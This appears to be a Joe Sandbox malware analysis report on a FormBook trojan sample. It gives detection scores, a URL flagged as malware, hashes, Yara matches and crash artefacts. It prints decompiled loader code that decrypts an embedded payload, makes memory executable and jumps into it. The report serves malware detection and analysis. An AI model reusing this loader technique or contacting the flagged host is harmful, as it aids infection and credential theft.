              Source: Yara matchFile source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management InstrumentationPath Interception1
              Process Injection
              1
              Virtualization/Sandbox Evasion
              OS Credential Dumping21
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
              Software Packing
              LSASS Memory1
              Virtualization/Sandbox Evasion
              Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
              Application Layer Protocol
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              Process Injection
              Security Account Manager1
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
              Obfuscated Files or Information
              NTDS1
              Remote System Discovery
              Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              nSMFpXgLe7.exe72%ReversingLabsWin32.Trojan.FormBook
              nSMFpXgLe7.exe67%VirustotalBrowse
              nSMFpXgLe7.exe100%AviraTR/Crypt.XPACK.Gen
              nSMFpXgLe7.exe100%Joe Sandbox ML
              No Antivirus matches
              SourceDetectionScannerLabelLinkDownload
              0.0.nSMFpXgLe7.exe.1140000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.nSMFpXgLe7.exe.1140000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              No Antivirus matches
              SourceDetectionScannerLabelLink
              www.carolinerosenstein.com/g44n/0%VirustotalBrowse
              www.carolinerosenstein.com/g44n/100%Avira URL Cloudmalware
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              www.carolinerosenstein.com/g44n/true
              • 0%, Virustotal, Browse
              • Avira URL Cloud: malware
              low
              NameSourceMaliciousAntivirus DetectionReputation
              http://upx.sf.netAmcache.hve.3.drfalse
                high
                No contacted IP infos
                Joe Sandbox Version:37.0.0 Beryl
                Analysis ID:830331
                Start date and time:2023-03-20 09:15:17 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 38s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:9
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:nSMFpXgLe7.exe
                Original Sample Name:0a319b287abb56f123671820092b89f79ca3730e1f625983da54f60d36e04f48.exe
                Detection:MAL
                Classification:mal96.troj.winEXE@2/6@0/0
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 97.8% (good quality ratio 88.1%)
                • Quality average: 66.1%
                • Quality standard deviation: 33.4%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 2
                • Number of non-executed functions: 9
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 20.42.73.29
                • Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, watson.telemetry.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                TimeTypeDescription
                09:17:01API Interceptor1x Sleep call for process: WerFault.exe modified
                No context
                No context
                No context
                No context
                No context
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):0.6245413242112693
                Encrypted:false
                SSDEEP:96:4TFWrORCuahkg7xf5pXIQcQvc6QcEDMcw3D7+HbHg6ZAXGng5FMTPSkvPkpXmTAj:yIr7LHBUZMX4jE/u7sWS274Its
                MD5:09B75D1DB01AFAA0B2D33F14EEB512E7
                SHA1:B6CEBEBC5838A5B1C5C6F97FFD443984A539F21F
                SHA-256:AA7AA80F064EBD02EB2F713006A74D8B45B4266FD18A21FB45977D166147FA17
                SHA-512:50610D814DCD922B1C7447F8D8B5C04F2B5848779D0D53265C4DE94756705FCD7FC0ABD95489D50A29D44A5CE32713638158AE4318DE93AA7A34125BC812F6A0
                Malicious:true
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.3.7.7.3.8.1.4.7.0.1.5.3.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.3.7.7.3.8.1.5.3.5.7.7.9.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.7.a.4.6.c.3.-.4.8.5.f.-.4.4.1.7.-.9.a.5.5.-.c.3.f.0.4.5.8.5.7.4.4.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.7.d.d.8.6.9.-.2.c.f.5.-.4.8.b.d.-.9.c.a.a.-.e.9.6.a.2.7.c.d.7.7.0.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.S.M.F.p.X.g.L.e.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.6.8.-.0.0.0.1.-.0.0.1.f.-.d.6.9.d.-.1.f.5.4.0.4.5.b.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.b.c.1.2.5.d.c.8.2.5.c.f.9.c.3.3.b.5.6.a.9.d.1.7.f.6.6.4.c.3.9.0.0.0.0.f.f.f.f.!.0.0.0.0.9.4.f.9.b.7.5.2.7.8.5.9.4.9.d.2.3.5.8.5.e.6.6.b.4.9.7.a.8.c.4.4.6.a.b.8.1.e.c.0.!.n.S.M.F.p.X.g.L.e.7...e.x.e.....T.a.r.g.e.t.A.p.p.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 14 streams, Mon Mar 20 08:16:54 2023, 0x1205a4 type
                Category:dropped
                Size (bytes):18900
                Entropy (8bit):2.3412202074630377
                Encrypted:false
                SSDEEP:96:5gX8ia8+GYs8B27KZ76i7kyxIXA/SQgBW5jWInWIX4Ixh0Np0N:OsiWse2KZ6O3Iics1hwp0
                MD5:42552E94BDA4E1485A954B8B55A651B5
                SHA1:124BE5B5D035CEAD6A50D63374AE57FCA09C5385
                SHA-256:85661E7888F6D0C6FD18B0FB67BAEA916CA8B056499B6604A1A3A0C932CCED46
                SHA-512:34B4A64FAD8AD2AD18B708B72F18B1A7D05F6505E3A37C7377886A844DAD61D2A8F5BD5AEA0960A55278E709F5D7C42EBF2974BC2F38CF5A82CC77F50D450795
                Malicious:false
                Reputation:low
                Preview:MDMP....... .......v..d............4........... ...<.......d...............T.......8...........T...............,A..........\...........H....................................................................U...........B..............GenuineIntelW...........T.......h...u..d.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8272
                Entropy (8bit):3.697352235557613
                Encrypted:false
                SSDEEP:192:Rrl7r3GLNidJ6wVG6Ye6SU0ptYgmf4ST+pr089beBsfbrfKm:RrlsNij6wG6YjSU0ptYgmf4SOe6fr
                MD5:059199AC4AA46B1A33445A6DB140773F
                SHA1:868654FC28F3CF67BD214689C9B1445FF2B6E6EC
                SHA-256:226EAE7D6AB560CCD6C4130E86FF3D197FE046806D6DC57001690E5F33C036CC
                SHA-512:F9FA8D376829B41EF2E1CDE6D5E2724E22D7B0853B7346ADCFE9F764DD7EEAD3BD2A59607A53AC92AF13450FECB4C7BC2D751FF97F79514D77BDA9175FF71B02
                Malicious:false
                Reputation:low
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.6.8.<./.P.i.d.>.......
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4563
                Entropy (8bit):4.467950748170684
                Encrypted:false
                SSDEEP:48:cvIwSD8zsltJgtWI9ejkWgc8sqYjJ8fm8M4JKgJZFFU2o+q8V9Y+oiVLV+d:uITfdJxgrsqYiJK2os7p+d
                MD5:9CA07AE19FAE9D38FDBD6DB287835411
                SHA1:E7B49388F4FF0D839BEA17AE6B0E61756F3B8E70
                SHA-256:D406B8343ADFEC7A2D17F8AB468F70F565E065AC6639C3D090427BA5A62DB7E0
                SHA-512:0136276BB5496C1CC5D167AB479BED4FB03E852E0C81C70FEA40FF77AAC5CC56292155958441120DAB94A5F0638387E50421A848FA11CD3C1314462F7483D006
                Malicious:false
                Reputation:low
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1960887" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):1572864
                Entropy (8bit):4.3089933357269405
                Encrypted:false
                SSDEEP:12288:yH5yRrVwR7+m1ZNyrG9oVUO0XCel/oUb+Ds/1J4aTznIvlGbC6:y5yRrVwR7+4ZNyjgXg
                MD5:BAB2124C54EC9F83224B104FA2691840
                SHA1:F3C37A6806EEA6A15793D18E7D04E67215BFF4DA
                SHA-256:955E99328EC83489BC31EA58783999C321FDC518FCCEF3952DA86CAF0EF3262E
                SHA-512:C18998D3D00B0093E16A815119EDD1E87293F6F7716BE0091A42238866B2C59A11B93BF50AF4905A7D1BD8DB15B445CC33EF90C9E1358487F3FBF0C055627345
                Malicious:false
                Reputation:low
                Preview:regfQ...Q...p.\..,.................. .... ......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.<sT.[...............................................................................................................................................................................................................................................................................................................................................$z.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):24576
                Entropy (8bit):3.9026710856348417
                Encrypted:false
                SSDEEP:384:COHW5K5jjaMGgnVVeeDzeg1NKZtjIexFa1VsoSwX7hami/qfl/DWwsfWexOkRb+:CSYKmg/eeDzeeNYtjtHaPsoSwlami/qU
                MD5:5CEB46A595011B8B545F38E678BF9B1A
                SHA1:53BCBF964A9131EC36CB6C5417DAFA91BEABB0FA
                SHA-256:3B5F2218858C96FC19F74FB7FCA07251092E9A84A912748F62487FE21E98516A
                SHA-512:AF0633792AA9B94EB395027BEF02E2981AF6E4C31E49CF26AADAFB7EF4EE101B8640CCEA473B6D37D5174ECB2C2E4080A586F2B3ECC5647B4D6DAB898DA97E4E
                Malicious:false
                Reputation:low
                Preview:regfP...P...p.\..,.................. .... ......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.<sT.[...............................................................................................................................................................................................................................................................................................................................................$z.HvLE.^......P.... ......'.....E.O.Xd..WF............................. ..hbin................p.\..,..........nk,.'.uT.[.................................. ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .'.uT.[...... ........................... .......Z.......................Root........lf......Root....nk .'.uT.[.................................. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.309327975339631
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.98%
                • DOS Executable Generic (2002/1) 0.02%
                File name:nSMFpXgLe7.exe
                File size:184832
                MD5:80b40bd25a0ad14166dbbe17215b678a
                SHA1:94f9b752785949d23585e66b497a8c446ab81ec0
                SHA256:0a319b287abb56f123671820092b89f79ca3730e1f625983da54f60d36e04f48
                SHA512:2e141f49fc827a47b57e9b2feaf2d40babc8c73636df3f5727708b5a54a8dcb9a8b77a71b3ca9b96334a262d380d6337e843bcb72d211f7607af284dec737385
                SSDEEP:3072:D7oHnT5GM1Em/A06sWMvYWAf7g/Gg6yw40R9aGovpwhX06JJWWNHh2qpsgAn9zfF:wHlT76iwzgOgp8R9aGovpwhX0AJDNHYX
                TLSH:5504AE36E601C075E2B242F5B26C177B843D2D342394A0A6F7E21AE56EF05F6B46931F
                File Content Preview:MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.........l..}...}...}.......}.......}.......}..Rich.}..................PE..L.....FD..........................................@........
                Icon Hash:00828e8e8686b000
                Entrypoint:0x4012b0
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Time Stamp:0x4446DE12 [Thu Apr 20 01:04:18 2006 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:
                Instruction
                push ebx
                mov ebx, esp
                sub esp, 08h
                and esp, FFFFFFF0h
                add esp, 04h
                push ebp
                mov ebp, dword ptr [ebx+04h]
                mov dword ptr [esp+04h], ebp
                mov ebp, esp
                sub esp, 000000A8h
                push esi
                push edi
                xorps xmm0, xmm0
                movq qword ptr [ebp-67h], xmm0
                movq qword ptr [ebp-5Fh], xmm0
                movq qword ptr [ebp-6Fh], xmm0
                movq qword ptr [ebp-37h], xmm0
                movq qword ptr [ebp-2Fh], xmm0
                movdqa dqword ptr [ebp-70h], xmm0
                movq qword ptr [ebp-3Fh], xmm0
                movq qword ptr [ebp-0000009Ch], xmm0
                movq qword ptr [ebp-60h], xmm0
                mov dword ptr [ebp-50h], 1FA501ABh
                mov dword ptr [ebp-4Ch], 4B0AFDD1h
                movq xmm0, qword ptr [ebp-50h]
                movq qword ptr [ebp-70h], xmm0
                xorps xmm0, xmm0
                mov al, 48h
                mov byte ptr [ebp-68h], al
                movdqa dqword ptr [ebp-40h], xmm0
                movq qword ptr [ebp-30h], xmm0
                mov dword ptr [ebp-20h], 6C022C76h
                mov eax, dword ptr [ebp-20h]
                movq qword ptr [ebp-0Ch], xmm0
                xor eax, 0665931Ch
                mov dword ptr [ebp-1Ch], 9A7FE8EEh
                movq xmm0, qword ptr [ebp-20h]
                movq qword ptr [ebp-40h], xmm0
                xor dword ptr [ebp-3Ch], 0665931Ch
                mov dword ptr [ebp-40h], eax
                lea eax, dword ptr [ebp-40h]
                push eax
                mov dword ptr [ebp-10h], 2975CB0Ah
                mov ecx, dword ptr [ebp-10h]
                mov dword ptr [ebp-18h], 4A88C1BFh
                mov dword ptr [ebp-14h], 7628C1D7h
                sldt word ptr [eax]
                Programming Language:
                • [C++] VS2012 build 50727
                • [ASM] VS2012 build 50727
                • [LNK] VS2012 build 50727
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x2d1380x2ce00False0.7525624564763231data7.324967441383678IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:09:16:53
                Start date:20/03/2023
                Path:C:\Users\user\Desktop\nSMFpXgLe7.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\nSMFpXgLe7.exe
                Imagebase:0x1140000
                File size:184832 bytes
                MD5 hash:80B40BD25A0AD14166DBBE17215B678A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.307157257.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Target ID:3
                Start time:09:16:53
                Start date:20/03/2023
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 208
                Imagebase:0xaa0000
                File size:434592 bytes
                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Reset < >

                  Execution Graph

                  Execution Coverage:0.1%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:100%
                  Total number of Nodes:3
                  Total number of Limit Nodes:0
                  execution_graph 15737 11414e9 15740 11414f0 NtProtectVirtualMemory 15737->15740 15739 114156f 15740->15739

                  Control-flow Graph

                  C-Code - Quality: 48%
                  			_entry_(void* __eflags) {
                  				intOrPtr _v8;
                  				short _v14;
                  				long _v16;
                  				short _v24;
                  				signed int _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				signed int _v44;
                  				char _v45;
                  				short _v47;
                  				long _v51;
                  				short _v52;
                  				signed int _v60;
                  				signed int _v64;
                  				signed int _v68;
                  				signed int _v72;
                  				signed int _v76;
                  				void* _v80;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				char _v93;
                  				short _v95;
                  				long _v99;
                  				short _v100;
                  				short _v104;
                  				signed int _v108;
                  				char _v116;
                  				char _v124;
                  				char _v125;
                  				intOrPtr _v126;
                  				signed int _v128;
                  				long _v132;
                  				long _v136;
                  				short _v138;
                  				short _v142;
                  				char _v160;
                  				char _v172;
                  				void* __ebx;
                  				void* _t94;
                  				void* _t106;
                  				void* _t119;
                  				signed int _t121;
                  				void* _t127;
                  				void* _t133;
                  				void* _t142;
                  
                  				_t142 = __eflags;
                  				_t116 = _t133;
                  				_v8 =  *((intOrPtr*)(_t133 + 4));
                  				asm("xorps xmm0, xmm0");
                  				asm("movq [ebp-0x67], xmm0");
                  				asm("movq [ebp-0x5f], xmm0");
                  				asm("movq [ebp-0x6f], xmm0");
                  				asm("movq [ebp-0x37], xmm0");
                  				asm("movq [ebp-0x2f], xmm0");
                  				asm("movdqa [ebp-0x70], xmm0");
                  				asm("movq [ebp-0x3f], xmm0");
                  				asm("movq [ebp-0x9c], xmm0");
                  				asm("movq [ebp-0x60], xmm0");
                  				_v92 = 0x1fa501ab;
                  				_v88 = 0x4b0afdd1;
                  				asm("movq xmm0, [ebp-0x50]");
                  				asm("movq [ebp-0x70], xmm0");
                  				asm("xorps xmm0, xmm0");
                  				_v116 = 0x48;
                  				asm("movdqa [ebp-0x40], xmm0");
                  				asm("movq [ebp-0x30], xmm0");
                  				_v44 = 0x6c022c76;
                  				asm("movq [ebp-0xc], xmm0");
                  				_v40 = 0x9a7fe8ee;
                  				asm("movq xmm0, [ebp-0x20]");
                  				asm("movq [ebp-0x40], xmm0");
                  				_v72 = _v72 ^ 0x0665931c;
                  				_v76 = _v44 ^ 0x0665931c;
                  				_v28 = 0x2975cb0a;
                  				_v36 = 0x4a88c1bf;
                  				_v32 = 0x7628c1d7;
                  				asm("movq xmm0, [ebp-0x18]");
                  				asm("movq [ebp-0x38], xmm0");
                  				_v68 = _v68 ^ 0x0665931c;
                  				_v64 = _v64 ^ 0x0665931c;
                  				_v99 = 0;
                  				_v51 = 0;
                  				_v172 = 0;
                  				_v95 = 0;
                  				_v93 = 0;
                  				_v47 = 0;
                  				_v45 = 0;
                  				_v100 = 0;
                  				_v52 = 0;
                  				_v16 = 0;
                  				_v60 = _v28 ^ 0x0665931c;
                  				E011416B0(_t133,  &_v124, 9,  &_v76);
                  				_v160 = 0;
                  				_v142 = 0;
                  				_v138 = 0;
                  				asm("xorps xmm0, xmm0");
                  				asm("movq [ebp-0x92], xmm0");
                  				asm("movq [ebp-0x8a], xmm0");
                  				E01141260( &_v160,  &_v124);
                  				_t94 = E01141190(_t142,  &_v160);
                  				asm("xorps xmm0, xmm0");
                  				asm("movdqa [ebp-0x70], xmm0");
                  				asm("movq [ebp-0x60], xmm0");
                  				_v100 = 0;
                  				E011416B0(_t133,  &_v124, "true",  &_v76);
                  				asm("xorps xmm0, xmm0");
                  				asm("movq [ebp-0x60], xmm0");
                  				_v28 = 0x3bd91e43;
                  				_v108 = _v28;
                  				_v24 = 0x8958;
                  				asm("movdqa [ebp-0x70], xmm0");
                  				_v104 = _v24;
                  				asm("movq [ebp-0xa], xmm0");
                  				_v44 = 0x9b6333ad;
                  				_v40 = 0x2b96170;
                  				asm("movq xmm0, [ebp-0x20]");
                  				asm("movq [ebp-0x70], xmm0");
                  				_v36 = 0x8f765dfe;
                  				_v32 = 0x3c488869;
                  				asm("movq xmm0, [ebp-0x18]");
                  				_v100 = 0;
                  				_v14 = 0;
                  				asm("movq [ebp-0x68], xmm0");
                  				E011416B0(_t116,  &_v124, 0x16,  &_v76);
                  				E011410A0( &_v172, _t94,  &_v124, 0, 0);
                  				_v80 = 0;
                  				_t106 = L01141730();
                  				_t119 = 0;
                  				while(1) {
                  					_t121 =  *(_t119 + _t106) ^ 0x17cf51d6;
                  					_v128 = _t121;
                  					if(_t121 == 0xc9 && _t121 == 0xb3 && _v126 == _t121 && _v125 == 0xc7) {
                  						break;
                  					}
                  					_t119 = _t119 + 1;
                  					if(_t119 < 0x4000) {
                  						continue;
                  					} else {
                  						_t127 = _v80;
                  					}
                  					L7:
                  					_v132 = 0;
                  					_v136 = 0x2ca00;
                  					NtProtectVirtualMemory(0xffffffff,  &_v80,  &_v136, 0x40,  &_v132); // executed
                  					_v76 = _v76 ^ 0x17cf51d6;
                  					_v72 = _v72 ^ 0x17cf51d6;
                  					_v68 = _v68 ^ 0x17cf51d6;
                  					_v64 = _v64 ^ 0x17cf51d6;
                  					_v60 = _v60 ^ 0x17cf51d6;
                  					E011416B0(_t116, _t127, 0x2ca00,  &_v76); // executed
                  					_t80 = _t127 + 0x21760; // 0x21760
                  					 *_t80();
                  					return 0;
                  				}
                  				_t127 = _t119 + _t106;
                  				_v80 = _t127;
                  				goto L7;
                  			}

















































                  0x011412b0
                  0x011412b1
                  0x011412c0
                  0x011412ce
                  0x011412d1
                  0x011412d6
                  0x011412db
                  0x011412e0
                  0x011412e5
                  0x011412ea
                  0x011412ef
                  0x011412f4
                  0x011412fc
                  0x01141301
                  0x01141308
                  0x0114130f
                  0x01141314
                  0x01141319
                  0x0114131e
                  0x01141321
                  0x01141326
                  0x0114132b
                  0x01141335
                  0x0114133f
                  0x01141346
                  0x0114134b
                  0x01141350
                  0x01141357
                  0x0114135e
                  0x01141368
                  0x0114136f
                  0x01141376
                  0x0114137e
                  0x01141383
                  0x0114138a
                  0x01141399
                  0x011413a0
                  0x011413a8
                  0x011413b2
                  0x011413b8
                  0x011413bc
                  0x011413c2
